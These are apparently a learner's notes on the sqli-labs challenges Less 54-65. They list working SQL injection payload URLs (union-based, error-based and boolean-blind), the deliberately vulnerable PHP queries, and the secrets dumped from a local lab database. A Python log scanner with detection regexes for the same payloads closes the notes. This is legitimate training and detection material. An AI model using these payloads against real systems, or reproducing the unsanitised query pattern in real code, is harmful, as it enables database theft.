SQLI-LAB practice notes (Less 54 - Less 65)
The following are just the notes I wrote down while working through the sqli-lab exercises, for reference only. Since I had already studied some SQL injection material, most of the content is not explained; if anything is unclear, please look it up with a search engine, and you should find what you need.
Less - 54 Challenge-1
(Lesson 54: Challenge 1)
Test:
http://localhost/sqli-lab/Less-54/index.php
The objective of this challenge is to dump the (secret key) from only random table from Database ('CHALLENGES') in Less than 10 attempts. Note: database name: challenges; maximum attempts: 10
http://localhost/sqli-lab/Less-54/index.php?id=1') union select 1,2,3 --+
Note: no valid data is displayed
http://localhost/sqli-lab/Less-54/index.php?id=1' union select 1,2,3 --+
Note: works; id is wrapped in single quotes
Source Code:
$sql="SELECT * FROM security.users WHERE id='$id' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row){
echo 'Your Login name:'. $row['username'];
echo 'Your Password:' .$row['password'];
}else{
//print_r(mysql_error());
}
Solution:
http://localhost/sqli-lab/Less-54/index.php?id=0' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='challenges' --+
//2x51x9lc2b
http://localhost/sqli-lab/Less-54/index.php?id=0' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='2x51x9lc2b' --+
//id,sessid,secret_QD6G,tryy
http://localhost/sqli-lab/Less-54/index.php?id=0' union select 1,group_concat(secret_QD6G),group_concat(sessid) from challenges.2x51x9lc2b --+
//t5OPJLdkJ60DsyF7T1ZL3rfD
//140491cdf5b17300fc51147a33ae86bf
Note: a regexp match dumps the table name and column name directly:
http://localhost/sqli-lab/Less-54/index.php?id=0' union select 1,table_name,column_name from information_schema.columns where column_name regexp '^secret_[A-Z]{4}$' limit 0,1;
Less - 55 Challenge-2
(Lesson 55: Challenge 2)
Test:
http://localhost/sqli-lab/Less-55/index.php
The objective of this challenge is to dump the (secret key) from only random table from Database ('CHALLENGES') in Less than 14 attempts. Note: database name: challenges; maximum attempts: 14
http://localhost/sqli-lab/Less-55/index.php?id=1' union select 1,2,3 --+
http://localhost/sqli-lab/Less-55/index.php?id=1') union select 1,2,3 --+
http://localhost/sqli-lab/Less-55/index.php?id=1" union select 1,2,3 --+
http://localhost/sqli-lab/Less-55/index.php?id=1") union select 1,2,3 --+
Note: no valid data is displayed
http://localhost/sqli-lab/Less-55/index.php?id=1) union select 1,2,3 --+
Note: works; id is wrapped in one layer of parentheses
Source Code:
$sql="SELECT * FROM security.users WHERE id=($id) LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row){
echo 'Your Login name:'. $row['username'];
echo 'Your Password:' .$row['password'];
}else{
//print_r(mysql_error());
}
Solution:
http://localhost/sqli-lab/Less-55/index.php?id=0) union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='challenges' --+
// tyqb9xz99r
http://localhost/sqli-lab/Less-55/index.php?id=0) union select 1,group_concat(column_name),3 from information_schema.columns where table_name='tyqb9xz99r' --+
// id,sessid,secret_0LLE,tryy
http://localhost/sqli-lab/Less-55/index.php?id=0) union select 1,group_concat(secret_0LLE),group_concat(sessid) from challenges.tyqb9xz99r --+
// HvXC6g9NxUeGwZtpfdEYCtUO
// 486412045b0a355f953e5aa5c8446bcb
Less - 56 Challenge-3
(Lesson 56: Challenge 3)
Test:
http://localhost/sqli-lab/Less-56/index.php
The objective of this challenge is to dump the (secret key) from only random table from Database ('CHALLENGES') in Less than 14 attempts. Note: database name: challenges; maximum attempts: 14
http://localhost/sqli-lab/Less-56/index.php?id=1' union select 1,2,3 --+
Note: no valid data is displayed
http://localhost/sqli-lab/Less-56/index.php?id=1') union select 1,2,3 --+
http://localhost/sqli-lab/Less-56/index.php?id=1" union select 1,2,3 --+
http://localhost/sqli-lab/Less-56/index.php?id=1") union select 1,2,3 --+
Note: works; id is wrapped in double quotes and one layer of parentheses
Source Code:
$sql="SELECT * FROM security.users WHERE id=('$id') LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row){
echo 'Your Login name:'. $row['username'];
echo 'Your Password:' .$row['password'];
}else{
//print_r(mysql_error());
}
Solution:
http://localhost/sqli-lab/Less-56/index.php?id=0') union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='challenges' --+
// l1meh6v8xf
http://localhost/sqli-lab/Less-56/index.php?id=0') union select 1,group_concat(column_name),3 from information_schema.columns where table_name='l1meh6v8xf' --+
// id,sessid,secret_ZIEU,tryy
http://localhost/sqli-lab/Less-56/index.php?id=0') union select 1,group_concat(secret_ZIEU),group_concat(sessid) from challenges.l1meh6v8xf --+
//3zjx2Ef32x2clWJlRlS4n2wc
// 2de68a7c5e3db6a836ab8f5f109416b8
Less - 57 Challenge-4
(Lesson 57: Challenge 4)
Test:
http://localhost/sqli-lab/Less-57/index.php
The objective of this challenge is to dump the (secret key) from only random table from Database ('CHALLENGES') in Less than 14 attempts. Note: database name: challenges; maximum attempts: 14
http://localhost/sqli-lab/Less-57/index.php?id=1") union select 1,2,3 --+
Note: no valid data is displayed
http://localhost/sqli-lab/Less-57/index.php?id=1' union select 1,2,3 --+
http://localhost/sqli-lab/Less-57/index.php?id=1') union select 1,2,3 --+
http://localhost/sqli-lab/Less-57/index.php?id=1" union select 1,2,3 --+
Note: works; id is wrapped in double quotes
Source Code:
$id= '"'.$id.'"';
$sql="SELECT * FROM security.users WHERE id=$id LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row){
echo 'Your Login name:'. $row['username'];
echo 'Your Password:' .$row['password'];
}else{
//print_r(mysql_error());
}
Solution:
http://localhost/sqli-lab/Less-57/index.php?id=0" union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='challenges' --+
// la5spfxomc
http://localhost/sqli-lab/Less-57/index.php?id=0" union select 1,group_concat(column_name),3 from information_schema.columns where table_name='la5spfxomc' --+
// id,sessid,secret_D2E9,tryy
http://localhost/sqli-lab/Less-57/index.php?id=0" union select 1,group_concat(secret_D2E9),group_concat(sessid) from challenges.la5spfxomc --+
// AkXpuSMRL2Mjnxbu6ChgdDkI
// 2c26f9a59b0ba61233e6fc0af8e47f14
Less - 58 Challenge-5
(Lesson 58: Challenge 5)
Test:
http://localhost/sqli-lab/Less-58/index.php
The objective of this challenge is to dump the (secret key) from only random table from Database ('CHALLENGES') in Less than 5 attempts. Note: database name: challenges; maximum attempts: 5
http://localhost/sqli-lab/Less-58/index.php?id=1' union select 1,2,3 --+
Note: works
http://localhost/sqli-lab/Less-58/index.php?id=1') union select 1,2,3 --+
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ') union select 1,2,3 -- ' LIMIT 0,1' at line 1
Note: id is wrapped in single quotes
Source Code:
$sql="SELECT * FROM security.users WHERE id='$id' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row){
$unames=array("Dumb","Angelina","Dummy","secure","stupid","superman","batman","admin","admin1","admin2","admin3","dhakkan","admin4");
$pass = array_reverse($unames);
echo 'Your Login name : '. $unames[$row['id']];
echo 'Your Password : ' .$pass[$row['id']];
}else{
print_r(mysql_error());
}
Solution:
http://localhost/sqli-lab/Less-58/index.php?id=0' union select 1,2,3 from (select count(*),concat((select concat(group_concat(table_name) ,0x3a,0x3a,database(),0x3a,0x3a) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+
//qrso3pw6sh::challenges::1
http://localhost/sqli-lab/Less-58/index.php?id=0' union select 1,2,3 from (select count(*),concat((select concat(group_concat(column_name) ,0x3a,0x3a) from information_schema.columns where table_schema=database() and table_name='qrso3pw6sh' limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+
//id,sessid,secret_MV87,tryy::1
http://localhost/sqli-lab/Less-58/index.php?id=0' union select 1,2,3 from (select count(*),concat((select concat(secret_MV87,0x3a, 0x3a) from challenges.qrso3pw6sh limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+
// 3XJM8hjFz6KNK5aoNUSApgRW::1
Less - 59 Challenge-6
(Lesson 59: Challenge 6)
Test:
http://localhost/sqli-lab/Less-59/index.php
The objective of this challenge is to dump the (secret key) from only random table from Database ('CHALLENGES') in Less than 5 attempts. Note: database name: challenges; maximum attempts: 5
http://localhost/sqli-lab/Less-59/index.php?id=1' union select 1,2,3 --+
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' union select 1,2,3 -- LIMIT 0,1' at line 1
Note: no delimiter around id
Source Code:
$sql="SELECT * FROM security.users WHERE id=$id LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row){
$unames=array("Dumb","Angelina","Dummy","secure","stupid","superman","batman","admin","admin1","admin2","admin3","dhakkan","admin4");
$pass = array_reverse($unames);
echo 'Your Login name : '. $unames[$row['id']];
echo 'Your Password : ' .$pass[$row['id']];
}else{
print_r(mysql_error());
}
Solution:
http://localhost/sqli-lab/Less-59/index.php?id=0 union select 1,2,3 from (select count(*),concat((select concat(group_concat(table_name) ,0x3a,0x3a,database(),0x3a,0x3a) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+
// b3ndcj1o8v::challenges::1
http://localhost/sqli-lab/Less-59/index.php?id=0 union select 1,2,3 from (select count(*),concat((select concat(group_concat(column_name) ,0x3a,0x3a) from information_schema.columns where table_schema=database() and table_name='b3ndcj1o8v' limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+
//id,sessid,secret_ZWS2,tryy::1
http://localhost/sqli-lab/Less-59/index.php?id=0 union select 1,2,3 from (select count(*),concat((select concat(secret_ZWS2 ,0x3a, 0x3a) from challenges.b3ndcj1o8v limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+
// zhEVMVgMavK0k92OSv8zmTTm::1
Less - 60 Challenge-7
(Lesson 60: Challenge 7)
Test:
http://localhost/sqli-lab/Less-60/index.php
The objective of this challenge is to dump the (secret key) from only random table from Database ('CHALLENGES') in Less than 5 attempts. Note: database name: challenges; maximum attempts: 5
http://localhost/sqli-lab/Less-60/index.php?id=1" union select 1,2,3 --+
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'union select 1,2,3 -- ") LIMIT 0,1' at line 1
Note: id is wrapped in double quotes and one layer of parentheses
Source Code:
$id = '("'.$id.'")';
$sql="SELECT * FROM security.users WHERE id=$id LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row){
$unames=array("Dumb","Angelina","Dummy","secure","stupid","superman","batman","admin","admin1","admin2","admin3","dhakkan","admin4");
$pass = array_reverse($unames);
echo 'Your Login name : '. $unames[$row['id']];
echo 'Your Password : ' .$pass[$row['id']];
}else{
print_r(mysql_error());
}
Solution:
http://localhost/sqli-lab/Less-60/index.php?id=0") union select 1,2,3 from (select count(*),concat((select concat(group_concat(table_name) ,0x3a,0x3a,database(),0x3a,0x3a) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+
//p9gd2w7p0n::challenges::1
http://localhost/sqli-lab/Less-60/index.php?id=0") union select 1,2,3 from (select count(*),concat((select concat(group_concat(column_name) ,0x3a,0x3a) from information_schema.columns where table_schema=database() and table_name='p9gd2w7p0n' limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+
//id,sessid,secret_THZK,tryy::1
http://localhost/sqli-lab/Less-60/index.php?id=0") union select 1,2,3 from (select count(*),concat((select concat(secret_THZK ,0x3a, 0x3a) from challenges.p9gd2w7p0n limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+
// OSpAsCGlNQ8qbUtTnEXHd0WL::1
Less - 61 Challenge-8
(Lesson 61: Challenge 8)
Test:
http://localhost/sqli-lab/Less-61/index.php
The objective of this challenge is to dump the (secret key) from only random table from Database ('CHALLENGES') in Less than 5 attempts. Note: database name: challenges; maximum attempts: 5
http://localhost/sqli-lab/Less-61/index.php?id=1' union select 1,2,3 --+
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'union select 1,2,3 -- ')) LIMIT 0,1' at line 1
Note: id is wrapped in single quotes and two layers of parentheses
Source Code:
$sql="SELECT * FROM security.users WHERE id=(('$id')) LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row){
$unames=array("Dumb","Angelina","Dummy","secure","stupid","superman","batman","admin","admin1","admin2","admin3","dhakkan","admin4");
$pass = array_reverse($unames);
echo 'Your Login name : '. $unames[$row['id']];
echo 'Your Password : ' .$pass[$row['id']];
}else{
print_r(mysql_error());
}
Solution:
http://localhost/sqli-lab/Less-61/index.php?id=0')) union select 1,2,3 from (select count(*),concat((select concat(group_concat(table_name) ,0x3a,0x3a,database(),0x3a,0x3a) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+
//t44dfrest6::challenges::1
http://localhost/sqli-lab/Less-61/index.php?id=0')) union select 1,2,3 from (select count(*),concat((select concat(group_concat(column_name) ,0x3a,0x3a) from information_schema.columns where table_schema=database() and table_name='t44dfrest6' limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+
//id,sessid,secret_BN4M,tryy::1
http://localhost/sqli-lab/Less-61/index.php?id=0')) union select 1,2,3 from (select count(*),concat((select concat(secret_BN4M,0x3a, 0x3a) from challenges.t44dfrest6 limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+
// dqlfs35mo8ZZlYKFZIvXboSe::1
Less - 62 Challenge-9
(Lesson 62: Challenge 9)
Test:
http://localhost/sqli-lab/Less-62/index.php
The objective of this challenge is to dump the (secret key) from only random table from Database ('CHALLENGES') in Less than 130 attempts. Note: database name: challenges; maximum attempts: 130
http://localhost/sqli-lab/Less-62/index.php?id=1' union select 1,2,3 --+
Note: no valid data is displayed
http://localhost/sqli-lab/Less-62/index.php?id=1') union select 1,2,3 --+
Note: works; id is wrapped in single quotes and one layer of parentheses
Source Code:
$sql="SELECT * FROM security.users WHERE id=('$id') LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row){
$unames=array("Dumb","Angelina","Dummy","secure","stupid","superman","batman","admin","admin1","admin2","admin3","dhakkan","admin4");
$pass = array_reverse($unames);
echo 'Your Login name : '. $unames[$row['id']];
echo 'Your Password : ' .$pass[$row['id']];
}else{
//print_r(mysql_error());
}
Solution:
http://localhost/sqli-lab/Less-62/index.php?id=1') and (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1) ,1,1))) > 97 --+
http://localhost/sqli-lab/Less-62/index.php?id=1') and (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1) ,1,1))) > 109 --+
http://localhost/sqli-lab/Less-62/index.php?id=1') and (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1) ,1,1))) > 115 --+
http://localhost/sqli-lab/Less-62/index.php?id=1') and (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1) ,1,1))) = 119 --+
// first character of the table name: w
// wlo99z7cua
http://localhost/sqli-lab/Less-62/index.php?id=1') and (ord(substr((select column_name from information_schema.columns limit 2,1),8,1)) %26 16) = 16 --+
http://localhost/sqli-lab/Less-62/index.php?id=1') and (ord(substr((select column_name from information_schema.columns limit 2,1),8,1)) %26 4) = 4 --+
http://localhost/sqli-lab/Less-62/index.php?id=1') and (ord(substr((select column_name from information_schema.columns limit 2,1),8,1)) %26 2) = 2 --+
// bit pattern 10110 = 22, so the fourth character from the end of the column name is V
// secret_VUBV
http://localhost/sqli-lab/Less-62/index.php?id=1') and (ascii(substr((select secret_VUBV from wlo99z7cua limit 0,1) ,1,1))) < 64 --+
http://localhost/sqli-lab/Less-62/index.php?id=1') and (ascii(substr((select secret_VUBV from wlo99z7cua limit 0,1) ,1,1))) < 53 --+
http://localhost/sqli-lab/Less-62/index.php?id=1') and (ascii(substr((select secret_VUBV from wlo99z7cua limit 0,1) ,1,1))) < 50 --+
http://localhost/sqli-lab/Less-62/index.php?id=1') and (ord(substr((select secret_VUBV from wlo99z7cua limit 0,1),1,1)) %26 1) = 1 --+
// first character of the key: 1
// 1kqTprKdfAt6VGFEoEcpYgjG
Note: the values are random
Table name: 10 characters, made up of lowercase letters and digits
secret_XXXX: the last four characters are made up of uppercase letters and digits
key: 24 characters, made up of upper- and lowercase letters and digits
Less - 63 Challenge-10
(Lesson 63: Challenge 10)
Test:
http://localhost/sqli-lab/Less-63/index.php
The objective of this challenge is to dump the (secret key) from only random table from Database ('CHALLENGES') in Less than 130 attempts. Note: database name: challenges; maximum attempts: 130
http://localhost/sqli-lab/Less-63/index.php?id=1') union select 1,2,3 --+
Note: no valid data is displayed
http://localhost/sqli-lab/Less-63/index.php?id=1' union select 1,2,3 --+
Note: works; id is wrapped in single quotes
Source Code:
$sql="SELECT * FROM security.users WHERE id='$id' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row){
$unames=array("Dumb","Angelina","Dummy","secure","stupid","superman","batman","admin","admin1","admin2","admin3","dhakkan","admin4");
$pass = array_reverse($unames);
echo 'Your Login name : '. $unames[$row['id']];
echo 'Your Password : ' .$pass[$row['id']];
}else{
//print_r(mysql_error());
}
Solution:
http://localhost/sqli-lab/Less-63/index.php?id=1' and (ascii(substr((select secret_8FVY from gelqg5ya7p limit 0,1) ,1,1))) > 64 --+
http://localhost/sqli-lab/Less-63/index.php?id=1' and (ascii(substr((select secret_8FVY from gelqg5ya7p limit 0,1) ,1,1))) < 96 --+
http://localhost/sqli-lab/Less-63/index.php?id=1' and (ascii(substr((select secret_8FVY from gelqg5ya7p limit 0,1) ,1,1))) < 77 --+
http://localhost/sqli-lab/Less-63/index.php?id=1' and (ascii(substr((select secret_8FVY from gelqg5ya7p limit 0,1) ,1,1))) > 70 --+
http://localhost/sqli-lab/Less-63/index.php?id=1' and (ascii(substr((select secret_8FVY from gelqg5ya7p limit 0,1) ,1,1))) < 73 --+
http://localhost/sqli-lab/Less-63/index.php?id=1' and (ord(substr((select secret_8FVY from gelqg5ya7p limit 0,1),1,1)) %26 1) = 1 --+
// first character of the key: G
// Gd65kBLDXbCY7wrwRq5jzM4l
Less - 64 Challenge-11
(Lesson 64: Challenge 11)
Test:
http://localhost/sqli-lab/Less-64/index.php
The objective of this challenge is to dump the (secret key) from only random table from Database ('CHALLENGES') in Less than 130 attempts. Note: database name: challenges; maximum attempts: 130
http://localhost/sqli-lab/Less-64/index.php?id=1' union select 1,2,3 --+
http://localhost/sqli-lab/Less-64/index.php?id=1') union select 1,2,3 --+
http://localhost/sqli-lab/Less-64/index.php?id=1" union select 1,2,3 --+
http://localhost/sqli-lab/Less-64/index.php?id=1") union select 1,2,3 --+
http://localhost/sqli-lab/Less-64/index.php?id=1) union select 1,2,3 --+
Note: no valid data is displayed
http://localhost/sqli-lab/Less-64/index.php?id=1)) union select 1,2,3 --+
Note: works; id is wrapped in two layers of parentheses
Source Code:
$sql="SELECT * FROM security.users WHERE id=(($id)) LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row){
$unames=array("Dumb","Angelina","Dummy","secure","stupid","superman","batman","admin","admin1","admin2","admin3","dhakkan","admin4");
$pass = array_reverse($unames);
echo 'Your Login name : '. $unames[$row['id']];
echo 'Your Password : ' .$pass[$row['id']];
}else{
//print_r(mysql_error());
}
Solution:
http://localhost/sqli-lab/Less-64/index.php?id=1)) and (ascii(substr((select secret_S0LE from tsgl6i8osu limit 0,1) ,1,1))) > 64 --+
http://localhost/sqli-lab/Less-64/index.php?id=1)) and (ascii(substr((select secret_S0LE from tsgl6i8osu limit 0,1) ,1,1))) > 97 --+
http://localhost/sqli-lab/Less-64/index.php?id=1)) and (ascii(substr((select secret_S0LE from tsgl6i8osu limit 0,1) ,1,1))) < 109 --+
http://localhost/sqli-lab/Less-64/index.php?id=1)) and (ascii(substr((select secret_S0LE from tsgl6i8osu limit 0,1) ,1,1))) < 106 --+
http://localhost/sqli-lab/Less-64/index.php?id=1)) and (ascii(substr((select secret_S0LE from tsgl6i8osu limit 0,1) ,1,1))) < 104 --+
http://localhost/sqli-lab/Less-64/index.php?id=1)) and (ascii(substr((select secret_S0LE from tsgl6i8osu limit 0,1) ,1,1))) = 103 --+
// first character of the key: g
// gpu9QBywZI8jL2M7Uj6DDELa
Less - 65 Challenge-12
(Lesson 65: Challenge 12)
Test:
http://localhost/sqli-lab/Less-65/index.php
The objective of this challenge is to dump the (secret key) from only random table from Database ('CHALLENGES') in Less than 130 attempts. Note: database name: challenges; maximum attempts: 130
http://localhost/sqli-lab/Less-65/index.php?id=1" union select 1,2,3 --+
Note: no valid data is displayed
http://localhost/sqli-lab/Less-65/index.php?id=1' union select 1,2,3 --+
http://localhost/sqli-lab/Less-65/index.php?id=1') union select 1,2,3 --+
http://localhost/sqli-lab/Less-65/index.php?id=1") union select 1,2,3 --+
Note: works; id is wrapped in double quotes and one layer of parentheses
Source Code:
$id = '"'.$id.'"';
$sql="SELECT * FROM security.users WHERE id=($id) LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row){
$unames=array("Dumb","Angelina","Dummy","secure","stupid","superman","batman","admin","admin1","admin2","admin3","dhakkan","admin4");
$pass = array_reverse($unames);
echo 'Your Login name : '. $unames[$row['id']];
echo 'Your Password : ' .$pass[$row['id']];
}else{
//print_r(mysql_error());
}
Solution:
http://localhost/sqli-lab/Less-65/index.php?id=1") and (ascii(substr((select secret_LARH from dfo1zhhb56 limit 0,1) ,1,1))) > 64 --+
http://localhost/sqli-lab/Less-65/index.php?id=1") and (ascii(substr((select secret_LARH from dfo1zhhb56 limit 0,1) ,1,1))) < 97 --+
http://localhost/sqli-lab/Less-65/index.php?id=1") and (ascii(substr((select secret_LARH from dfo1zhhb56 limit 0,1) ,1,1))) > 77 --+
http://localhost/sqli-lab/Less-65/index.php?id=1") and (ascii(substr((select secret_LARH from dfo1zhhb56 limit 0,1) ,1,1))) > 84 --+
http://localhost/sqli-lab/Less-65/index.php?id=1") and (ascii(substr((select secret_LARH from dfo1zhhb56 limit 0,1) ,1,1))) < 88 --+
http://localhost/sqli-lab/Less-65/index.php?id=1") and (ascii(substr((select secret_LARH from dfo1zhhb56 limit 0,1) ,1,1))) > 85 --+
http://localhost/sqli-lab/Less-65/index.php?id=1") and (ascii(substr((select secret_LARH from dfo1zhhb56 limit 0,1) ,1,1))) = 87 --+
// first character of the key: W
// Wa0mYczFC0wFXygjAFaCA1Tb
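The three payload families used across these notes (union-based enumeration of information_schema in Less 54-57, the floor(rand(0)*2) group-by error trick in Less 58-61, and ascii/ord(substr()) boolean-blind probing in Less 62-65) leave distinctive traces in the web server's access log. The scanner below is an added example written for this page, not code from sqli-labs; the log format (Apache combined) and the sample log lines are constructed.

```python
"""Flag the SQL injection probe families seen in the Less 54-65 notes in
access-log lines. Added example for this page, not part of sqli-labs."""
import re
from collections import Counter
from urllib.parse import unquote_plus

# One signature per family that appears in the write-up above.
SIGNATURES = {
    "union-based": re.compile(r"\bunion\b[\s/*]+(?:all[\s/*]+)?select\b", re.I),
    "schema-enum": re.compile(r"\binformation_schema\s*\.\s*(?:tables|columns)\b", re.I),
    "error-based": re.compile(r"floor\s*\(\s*rand\s*\(\s*0?\s*\)\s*\*\s*2\s*\)", re.I),
    "boolean-blind": re.compile(r"\b(?:ascii|ord)\s*\(\s*substr(?:ing)?\s*\(", re.I),
}

# Apache combined log format (assumed); only the fields the scanner needs are captured.
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# Constructed sample: one benign request, then one request per injection family.
SAMPLE_LOG = """\
127.0.0.1 - - [10/Oct/2023:13:55:36 +0800] "GET /sqli-lab/Less-54/index.php?id=1 HTTP/1.1" 200 512
127.0.0.1 - - [10/Oct/2023:13:55:40 +0800] "GET /sqli-lab/Less-54/index.php?id=0'%20union%20select%201,group_concat(table_name),3%20from%20information_schema.tables%20where%20table_schema='challenges'%20--+ HTTP/1.1" 200 540
127.0.0.1 - - [10/Oct/2023:13:56:01 +0800] "GET /sqli-lab/Less-58/index.php?id=0'%20union%20select%201,2,3%20from%20(select%20count(*),concat((select%20database()),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a%20--+ HTTP/1.1" 200 610
127.0.0.1 - - [10/Oct/2023:13:57:12 +0800] "GET /sqli-lab/Less-62/index.php?id=1')%20and%20(ascii(substr((select%20table_name%20from%20information_schema.tables%20where%20table_schema=database()%20limit%200,1),1,1)))%20%3E%2097%20--+ HTTP/1.1" 200 512
"""


def classify(query_string):
    """Return the sorted list of signature names matched by one raw query string."""
    # %20 and '+' become spaces, %26 becomes '&', %3E becomes '>', so the
    # signatures run against what the application (and MySQL) actually saw.
    decoded = unquote_plus(query_string)
    return sorted(name for name, rx in SIGNATURES.items() if rx.search(decoded))


def scan_log(lines):
    """Return (ip, script path, families) for every request that matches a signature."""
    hits = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue  # malformed or non-request line; skip rather than crash
        script, _, qs = m.group("path").partition("?")
        families = classify(qs)
        if families:
            hits.append((m.group("ip"), script, families))
    return hits


def blind_probe_counts(hits, threshold=10):
    """Count boolean-blind probes per source IP and keep the sources at or above threshold.
    A single blind dump in the notes above needs dozens of requests, so the volume
    itself is a signal even when individual probes look harmless."""
    counts = Counter(ip for ip, _, fams in hits if "boolean-blind" in fams)
    return {ip: n for ip, n in counts.items() if n >= threshold}


if __name__ == "__main__":
    for ip, script, fams in scan_log(SAMPLE_LOG.splitlines()):
        print(f"{ip} {script}: {', '.join(fams)}")
    print("blind-probe sources:", blind_probe_counts(scan_log(SAMPLE_LOG.splitlines()), 1))
```

The `%26` seen in the Less 62 URLs is the encoded `&` operator of the bit-test probes; decoding before matching is what lets the `ord(substr(` signature see the payload as MySQL did.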